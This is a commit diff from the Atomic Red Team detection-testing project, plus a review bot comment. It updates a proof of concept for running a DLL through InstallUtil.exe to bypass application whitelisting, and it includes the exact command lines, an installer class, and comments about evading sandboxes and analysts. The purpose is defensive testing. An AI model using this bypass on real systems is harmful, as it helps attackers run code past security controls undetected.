Merge pull request #134 from redcanaryco/atomic-dev-cs

Atomic dev cs
Michael Haag
2018-05-07 16:21:30 -04:00
committed by GitHub
2 changed files with 10 additions and 10 deletions
+1 -1
@@ -8,7 +8,7 @@ Input:
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtilBypass.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InastallUtilBypass.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtilBypass.dll
## Test Script
+9 -9
@@ -10,10 +10,10 @@ Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Step One:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:InstallUtilBypass.exe InstallUtilBypass.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:InstallUtilBypass.exe /target:library InstallUtilBypass.cs
Step Two:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false InstallUtilBypass.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false InstallUtilBypass.dll
*/
@@ -24,11 +24,11 @@ public class Program
{
Console.WriteLine("Hey There From Main()");
//Add any behaviour here to throw off sandbox execution/analysts :)
//These binaries can exhibit one behavior when executed in sandbox, and entirely different one when invoked
//These binaries can exhibit one behavior when executed in sandbox, and entirely different one when invoked
//by InstallUtil.exe
}
}
[System.ComponentModel.RunInstaller(true)]
@@ -37,9 +37,9 @@ public class Sample : System.Configuration.Install.Installer
//The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
public override void Uninstall(System.Collections.IDictionary savedState)
{
Console.WriteLine("Hello There From Uninstall, If you are reading this, prevention has failed.");
Console.WriteLine(@"Hello There From Uninstall, If you are reading this, prevention has failed.\n");
}
}
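Review bot: In the Step One comment, the compile line that adds `/target:library` still names its output `/out:InstallUtilBypass.exe`, while the Step Two line now passes `InstallUtilBypass.dll` to InstallUtil.exe, so following the two steps as written leaves no file of that name to load; assuming the `/target:library` line is the new side, it should read `/out:InstallUtilBypass.dll /target:library`. For anyone running this test to validate detections, a run that stops on a missing file never prints the Uninstall message and can be misread as the control having blocked it. Separately, in the Uninstall hunk the new string is a verbatim literal, so `@"...\n"` prints a literal backslash-n; drop either the `@` or the `\n`, since `Console.WriteLine` already ends the line. The header comment and both classes start outside the visible hunks.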